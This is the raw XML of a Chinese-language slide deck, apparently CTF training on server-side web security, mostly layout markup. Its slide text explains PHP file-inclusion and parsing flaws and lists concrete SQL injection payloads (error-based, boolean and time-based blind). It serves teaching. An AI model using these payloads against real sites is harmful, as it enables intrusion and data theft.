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3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="671" r:id="rId5"/>
    <p:sldId id="725" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="318" r:id="rId8"/>
    <p:sldId id="298" r:id="rId9"/>
    <p:sldId id="319" r:id="rId10"/>
    <p:sldId id="357" r:id="rId11"/>
    <p:sldId id="358" r:id="rId12"/>
    <p:sldId id="359" r:id="rId13"/>
    <p:sldId id="360" r:id="rId14"/>
    <p:sldId id="362" r:id="rId15"/>
    <p:sldId id="363" r:id="rId16"/>
    <p:sldId id="386" r:id="rId17"/>
    <p:sldId id="409" r:id="rId18"/>
    <p:sldId id="387" r:id="rId19"/>
    <p:sldId id="599" r:id="rId20"/>
    <p:sldId id="410" r:id="rId22"/>
    <p:sldId id="600" r:id="rId23"/>
    <p:sldId id="411" r:id="rId24"/>
    <p:sldId id="417" r:id="rId25"/>
    <p:sldId id="412" r:id="rId26"/>
    <p:sldId id="445" r:id="rId27"/>
    <p:sldId id="413" r:id="rId28"/>
    <p:sldId id="446" r:id="rId29"/>
    <p:sldId id="447" r:id="rId30"/>
    <p:sldId id="598" r:id="rId31"/>
    <p:sldId id="418" r:id="rId32"/>
    <p:sldId id="415" r:id="rId33"/>
    <p:sldId id="448" r:id="rId34"/>
    <p:sldId id="475" r:id="rId35"/>
    <p:sldId id="449" r:id="rId36"/>
    <p:sldId id="476" r:id="rId37"/>
    <p:sldId id="500" r:id="rId38"/>
    <p:sldId id="523" r:id="rId39"/>
    <p:sldId id="361" r:id="rId40"/>
    <p:sldId id="416" r:id="rId41"/>
    <p:sldId id="525" r:id="rId42"/>
    <p:sldId id="526" r:id="rId43"/>
    <p:sldId id="527" r:id="rId44"/>
    <p:sldId id="549" r:id="rId45"/>
    <p:sldId id="570" r:id="rId46"/>
    <p:sldId id="594" r:id="rId47"/>
    <p:sldId id="595" r:id="rId48"/>
    <p:sldId id="596" r:id="rId49"/>
    <p:sldId id="597" r:id="rId50"/>
    <p:sldId id="601" r:id="rId51"/>
    <p:sldId id="604" r:id="rId52"/>
    <p:sldId id="603" r:id="rId53"/>
    <p:sldId id="571" r:id="rId54"/>
    <p:sldId id="573" r:id="rId55"/>
    <p:sldId id="614" r:id="rId56"/>
    <p:sldId id="605" r:id="rId57"/>
    <p:sldId id="606" r:id="rId58"/>
    <p:sldId id="607" r:id="rId59"/>
    <p:sldId id="608" r:id="rId60"/>
    <p:sldId id="609" r:id="rId61"/>
    <p:sldId id="810" r:id="rId62"/>
    <p:sldId id="811" r:id="rId63"/>
    <p:sldId id="612" r:id="rId64"/>
    <p:sldId id="613" r:id="rId65"/>
    <p:sldId id="282" r:id="rId66"/>
    <p:sldId id="341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9" r:id="rId77"/>
    <p:sldId id="658" r:id="rId78"/>
    <p:sldId id="660" r:id="rId79"/>
    <p:sldId id="661" r:id="rId80"/>
    <p:sldId id="669" r:id="rId81"/>
    <p:sldId id="670" r:id="rId82"/>
    <p:sldId id="662" r:id="rId83"/>
    <p:sldId id="663" r:id="rId84"/>
    <p:sldId id="664" r:id="rId85"/>
    <p:sldId id="665" r:id="rId86"/>
    <p:sldId id="666" r:id="rId87"/>
    <p:sldId id="667" r:id="rId88"/>
    <p:sldId id="668" r:id="rId89"/>
    <p:sldId id="842" r:id="rId90"/>
    <p:sldId id="726" r:id="rId91"/>
    <p:sldId id="846" r:id="rId92"/>
    <p:sldId id="285" r:id="rId9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88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其中临时文件内容正是我们POST请求中文件内容，临时文件的名称是php+随机数字.tmp,正中本地文件包含痛点。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在PHP中，有超全局变量$_FILES,保存上传文件的信息，包括文件名、类型、临时文件名、错误代号、大小。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通常，HTTP中的响应消息都是整个发送的，在发送之前知道Content-Lenth值，作为响应头的一部分发送给客户端。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分块传输编码，可以在不知道Content-Lenth情况下，进行分块传输，并把Content-Lenth置为chunked。PHP默认情况，当传输数据大于4KB时，采用分块传输编码。将数据分为一块或多块传输。传输格式是：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每一个非空的块都以该块包含数据的字节数（字节数以十六进制表示）开始，跟随一个CRLF （回车及换行），然后是数据本身，最后块CRLF结束。在一些实现中，块大小和CRLF之间填充有白空格（0x20）。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通过观察PHPinfo的信息，在$_FILES信息下面，还有请求头的相关信息，我们可以在请求的时候，通过填充大量无用数据，来增加后面数据的长度，从而增加脚本的处理时间，为包含文件争取更多的时间。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通常，HTTP中的响应消息都是整个发送的，在发送之前知道Content-Lenth值，作为响应头的一部分发送给客户端。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分块传输编码，可以在不知道Content-Lenth情况下，进行分块传输，并把Content-Lenth置为chunked。PHP默认情况，当传输数据大于4KB时，采用分块传输编码。将数据分为一块或多块传输。传输格式是：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每一个非空的块都以该块包含数据的字节数（字节数以十六进制表示）开始，跟随一个CRLF （回车及换行），然后是数据本身，最后块CRLF结束。在一些实现中，块大小和CRLF之间填充有白空格（0x20）。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通过观察PHPinfo的信息，在$_FILES信息下面，还有请求头的相关信息，我们可以在请求的时候，通过填充大量无用数据，来增加后面数据的长度，从而增加脚本的处理时间，为包含文件争取更多的时间。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GIF89a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AddType application/x-httpd-php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微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>需要 magic_quotes_gpc=off，PHP小于5.3.4有效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微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>需要 magic_quotes_gpc=off，PHP小于5.3.4有效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当访问www.xx.com/phpinfo.jpg/1.php这个URL时，$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”，然后构造成SCRIPT_FILENAME传递给PHP CGI，但是PHP为什么会接受这样的参数，并将phpinfo.jpg作为PHP文件解析呢?这就要说到fix_pathinfo这个选项了。 如果开启了这个选项，那么就会触发在PHP中的如下逻辑：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PHP会认为SCRIPT_FILENAME是phpinfo.jpg，而1.php是PATH_INFO，所以就会将phpinfo.jpg作为PHP文件来解析了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绝对路径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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>ure_file_priv的值为null ，表示限制mysqld 不允许导入|导出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当secure_file_priv的值为/tmp/ ，表示限制mysqld 的导入|导出只能发生在/tmp/目录下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制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windows下：修改my.ini 在[mysqld]内加入secure_file_priv =</a:t>
            </a:r>
          </a:p>
          <a:p/>
          <a:p>
            <a:r>
              <a:t>linux下：修改my.cnf 在[mysqld]内加入secure_file_priv =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数据库是可以认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进制编码后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句的，可以直接执行，在一些二次注入的场合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码很有用，因为二次注入是将一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句存入数据库中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进制等同于编码前，但是在存入的过程中甚至可以绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>is_numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这样的严格限制。在绕过单引号方面也是非常好用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iis+asp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%u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代码进行了多一次的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解码，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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句这么多的关键字和函数，不要在一棵树上吊死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正则会对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作截断处理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http://localhost/xman2017/?order=if((select(mid(flag,5,1))from(flag)),name,price)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apache日志分为access.log与error.log，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/var/log/apache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这是web进程运行时的环境变量，其中有些参数是可以被用户控制的，最常见做法就是在User-Agent中插入一句话。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" name="图片 6" descr="XCT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" name="图片 6" descr="XCT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" name="图片 4" descr="XCT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bg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bg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.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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image" Target="../media/image1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image" Target="../media/image1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.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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image" Target="../media/image1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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1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3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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9.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.pn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53.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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9.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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image" Target="../media/image4.png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4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image" Target="../media/image4.png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../media/image4.png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3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.pn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7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.pn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1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.pn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5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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9.xml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image" Target="../media/image4.png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4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image" Target="../media/image4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image" Target="../media/image4.png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4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag233.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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image" Target="../media/image4.png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image" Target="../media/image4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9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag248.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag253.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag258.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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image" Target="../media/image4.png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image" Target="../media/image4.png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4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag273.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag278.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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image" Target="../media/image4.png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9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag288.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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94.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag293.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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image" Target="../media/image1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image" Target="../media/image4.png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image" Target="../media/image4.png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09.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag308.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag313.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag318.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png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8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image" Target="../media/image4.png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image" Target="../media/image4.png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3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png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7.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png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8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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png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image" Target="../media/image1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2437"/>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="284D7A"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0F243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直接连接符 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3524250" y="6167438"/>
            <a:ext cx="1284288" cy="677862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51" name="直接连接符 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3571875" y="1851025"/>
            <a:ext cx="8634413" cy="4346575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52" name="六边形 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1301750" y="1695450"/>
            <a:ext cx="4510088" cy="388778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8D8D8"/>
          </a:solidFill>
          <a:ln w="1016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直接连接符 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5753100" y="0"/>
            <a:ext cx="3175" cy="5064125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54" name="直接连接符 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1377950" y="-3175"/>
            <a:ext cx="2193925" cy="109855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55" name="直接连接符 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1373188" y="4662488"/>
            <a:ext cx="1587" cy="2195512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56" name="直接连接符 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-60000" flipV="1">
            <a:off x="0" y="2016125"/>
            <a:ext cx="1754188" cy="81280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57" name="文本框 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1629240">
            <a:off x="5597843" y="2424748"/>
            <a:ext cx="6899910" cy="1005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6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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6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中的服务端安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6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2060" name="六边形 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1052513" y="1479550"/>
            <a:ext cx="5010150" cy="4319588"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 24996"/>
              <a:gd name="vf" fmla="val 115470"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1016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xman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645" y="2520950"/>
            <a:ext cx="3896360" cy="2098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rot="20040000">
            <a:off x="7018655" y="4195445"/>
            <a:ext cx="33013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赵博栋</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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Union</a:t>
            </a:r>
            <a:r>
              <a:rPr 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注入</a:t>
            </a:r>
            <a:endParaRPr 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1005"/>
            <a:ext cx="5835015" cy="1751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900" y="1691005"/>
            <a:ext cx="5876290" cy="50298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Union</a:t>
            </a:r>
            <a:r>
              <a:rPr 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注入</a:t>
            </a:r>
            <a:endParaRPr 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Union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语句可以填充查询结果，并且额外执行一次查询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32685"/>
            <a:ext cx="8948420" cy="19056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38320"/>
            <a:ext cx="8947785" cy="19494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Union</a:t>
            </a:r>
            <a:r>
              <a:rPr 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注入</a:t>
            </a:r>
            <a:endParaRPr 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Union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语句可以填充查询结果，并且额外执行一次查询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768600"/>
            <a:ext cx="8832850" cy="16814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Union</a:t>
            </a:r>
            <a:r>
              <a:rPr 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注入限制</a:t>
            </a:r>
            <a:endParaRPr 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很多攻击场景不是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语句注入，不存在直接回显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Union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关键词经常被过滤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报错注入</a:t>
            </a:r>
            <a:endParaRPr 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页面输出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报错信息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注入效率高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语句使数据库报错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报错信息里包含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语句执行结果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常见报错注入函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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7180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floor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(Mysql)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:   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);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extractvalue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(Mysql): </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));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updatexml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(Mysql): </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and 1=(updatexml(1,concat(0x3a,(select user())),1))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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>EXP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： </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Exp(~(select * from (select user())a))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UTL_INADDR.get_host_address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(Oracle):and 1=utl_inaddr.get_host_address((select banner() from sys.v_$version where rownum=1))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.....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923290"/>
            <a:ext cx="10515600" cy="52539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id=2' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);#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id=2' and extractvalue(1, concat(0x5c, (select @@version limit 1)));#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id=2' and 1=(updatexml(1,concat(0x5e24,(select @@version),0x5e24),1))#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815" y="2003425"/>
            <a:ext cx="10495915" cy="10198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295" y="3409315"/>
            <a:ext cx="5923915" cy="714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295" y="5096510"/>
            <a:ext cx="6228080" cy="8077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Boolean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盲注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在没有数据回显的情况下，可以存在不同的页面内容回显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通常逐个爆破猜解，效率偏低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思路：利用回显的不同推测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语句执行的结果是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True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还是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False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payload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 * from users where user='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xx' and pass&gt;'123'#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'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截取字符串相关函数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left(a,b)从左侧截取 a 的前 b 位：left(database(),1)&gt;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'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s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'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substr(a,b,c)从 b 位置开始， 截取字符串 a 的 c 长度。 Ascii()将某个字符转换为 ascii 值：ascii(substr(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user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),1,1))=101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mid(a,b,c)从位置 b 开始， 截取 a 字符串的 c 位：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regexp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正则表达式的用法， user()结果为 root， regexp 为匹配 root 的正则表达式：select user() regexp '^ro'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IF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语句：select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));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Timing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盲注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页面不存在不同回显，但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语句被执行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逐个爆破猜解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时间延迟，效率最低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利用：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if (query=True) delay(1000);else pass;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的程序逻辑，通过观察是否发生了时间延迟来推测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语句的执行情况是否为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True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payload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：If(ascii(substr(database(),1,1))&gt;115,0,sleep(5))%23 //if 判断语句， 条件为假，执行 sleep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2437"/>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="284D7A"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0F243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矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715010" y="931863"/>
            <a:ext cx="10761663" cy="5518150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706563" y="1654175"/>
            <a:ext cx="2765425" cy="2670175"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 116"/>
              <a:gd name="txT" fmla="*/ 0 h 112"/>
              <a:gd name="txR" fmla="*/ 116 w 116"/>
              <a:gd name="txB" fmla="*/ 112 h 11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16" h="112">
                <a:moveTo>
                  <a:pt x="95" y="29"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="52" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="86"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="29"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="50" y="79"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="50" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="79"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17" y="67"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="67"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="81" y="36"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="36"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17" y="60"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="57" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="60"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="88" y="103"/>
                </a:moveTo>
                <a:lnTo>
